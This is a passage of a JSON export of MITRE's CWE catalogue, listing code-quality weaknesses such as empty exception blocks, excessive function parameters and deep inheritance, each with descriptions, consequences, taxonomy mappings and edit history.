Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1058":{"attr":{"@_ID":"1058","@_Name":"Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a function or method that\\n\\t\\t operates in a multi-threaded environment but owns an unsafe non-final\\n\\t\\t static storable or member data element.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-11"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-11"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1059":{"attr":{"@_ID":"1059","@_Name":"Incomplete Documentation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The documentation, whether on paper or in electronic form, does\\n\\t\\t\\t\\t\\tnot contain descriptions of all the relevant elements of the product, such as\\n\\t\\t\\t\\t\\tits usage, structure, interfaces, design, implementation, configuration,\\n\\t\\t\\t\\t\\toperation, etc.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1060":{"attr":{"@_ID":"1060","@_Name":"Excessive Number of Inefficient Server-Side Data Accesses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs too many data queries without using efficient data processing functionality such as stored procedures.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly due to computational expense. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"too many data queries\\" may vary for each product or developer, CISQ recommends a default maximum of 5 data queries for an inefficient function/procedure."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-9"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-9"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1061":{"attr":{"@_ID":"1061","@_Name":"Insufficient Encapsulation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-969"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1062":{"attr":{"@_ID":"1062","@_Name":"Parent Class with References to Child Class","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code has a parent class that contains references to a child class, its methods, or its members.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-14"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-14"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1063":{"attr":{"@_ID":"1063","@_Name":"Creation of Class Instance within a Static Code Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A static code block creates an instance of a class.","Extended_Description":{"xhtml:p":["This pattern identifies situations where a storable data element or member data element is initialized with a value in a block of code which is declared as static.","This issue can make the software perform more slowly by performing initialization before it is needed. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1064":{"attr":{"@_ID":"1064","@_Name":"Invokable Control Element with Signature Containing an Excessive Number of Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a function, subroutine, or method whose signature has an unnecessarily large number of\\n\\t\\t\\t\\t\\tparameters/arguments.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of parameters.\\" may vary for each product or developer, CISQ recommends a default maximum of 7 parameters/arguments."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-13"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-13"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1065":{"attr":{"@_ID":"1065","@_Name":"Runtime Resource Management Control Element in a Component Built to Run on Application Servers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1066":{"attr":{"@_ID":"1066","@_Name":"Missing Serialization Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a serializable data element that does not\\n\\t\\t\\t\\t\\thave an associated serialization method.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably, e.g. by triggering an exception. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1067":{"attr":{"@_ID":"1067","@_Name":"Excessive Execution of Sequential Searches of Data Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a data query against an SQL table or view\\n\\t\\t\\t\\t\\tthat is configured in a way that does not utilize an index and may cause\\n\\t\\t\\t\\t\\tsequential searches to be performed.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1068":{"attr":{"@_ID":"1068","@_Name":"Inconsistency Between Implementation and Documented Design","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The implementation of the product is not consistent with the\\n\\t\\t\\t\\t\\tdesign as described within the relevant documentation.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1069":{"attr":{"@_ID":"1069","@_Name":"Empty Exception Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An invokable code block contains an exception handling block that does not contain any code, i.e. is empty.","Extended_Description":{"xhtml:p":"When an exception handling block (such as a Catch and Finally block) is used, but that block is empty, this can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1071","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}}},"1070":{"attr":{"@_ID":"1070","@_Name":"Serializable Data Element Containing non-Serializable Item Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a serializable, storable data element such as a field or member,\\n\\t\\t\\t\\t\\tbut the data element contains member elements that are not\\n\\t\\t\\t\\t\\tserializable.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1071":{"attr":{"@_ID":"1071","@_Name":"Empty Code Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains a block that does not contain any code, i.e., the block is empty.","Extended_Description":{"xhtml:p":"Empty code blocks can occur in the bodies of conditionals, function or method definitions, exception handlers, etc. While an empty code block might be intentional, it might also indicate incomplete implementation, accidental code deletion, unexpected macro expansion, etc. For some programming languages and constructs, an empty block might be allowed by the syntax, but the lack of any behavior within the block might violate a convention or API in such a way that it is an error."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-02"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}}},"1072":{"attr":{"@_ID":"1072","@_Name":"Data Resource Access without Use of Connection Pooling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software accesses a data resource through a database without using a\\n\\t\\t\\t\\t\\tconnection pooling capability.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly, as connection pools allow connections to be reused without the overhead and time consumption of opening and closing a new connection. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-13"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-13"}},{"attr":{"@_External_Reference_ID":"REF-974"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1073":{"attr":{"@_ID":"1073","@_Name":"Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large number of data accesses/queries\\" may vary for each product or developer, CISQ recommends a default maximum of 2 data accesses per function/method."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1074":{"attr":{"@_ID":"1074","@_Name":"Class with Excessively Deep Inheritance","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class has an inheritance level that is too high, i.e., it\\n\\t\\t\\t\\t\\thas a large number of parent classes.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of parent classes\\" may vary for each product or developer, CISQ recommends a default maximum of 7 parent classes."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-17"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-17"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1075":{"attr":{"@_ID":"1075","@_Name":"Unconditional Control Flow Transfer outside of Switch Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs unconditional control transfer (such as a\\n\\t\\t\\t\\t\\t\\"goto\\") in code outside of a branching structure such as a switch\\n\\t\\t\\t\\t\\tblock.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1076":{"attr":{"@_ID":"1076","@_Name":"Insufficient Adherence to Expected Conventions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s architecture, source code, design, documentation,\\n\\t\\t\\t\\t\\tor other artifact does not follow required conventions.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1077":{"attr":{"@_ID":"1077","@_Name":"Floating Point Comparison with Incorrect Operator","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code performs a comparison such as an\\n equality test between two float (floating point) values, but\\n it uses comparison operators that do not account for the\\n possibility of loss of precision.","Extended_Description":{"xhtml:p":["Numeric calculation using floating point values\\n\\t can generate imprecise results because of rounding errors.\\n\\t As a result, two different calculations might generate\\n\\t numbers that are mathematically equal, but have slightly\\n\\t different bit representations that do not translate to the\\n\\t same mathematically-equal values. As a result, an equality\\n\\t test or other comparison might produce unexpected\\n\\t results.","This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-9"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-9"}},{"attr":{"@_External_Reference_ID":"REF-975"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1078":{"attr":{"@_ID":"1078","@_Name":"Inappropriate Source Code Style or Formatting","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code does not follow\\n\\t\\t\\t\\tdesired style or formatting for indentation, white\\n\\t\\t\\t\\tspace, comments, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 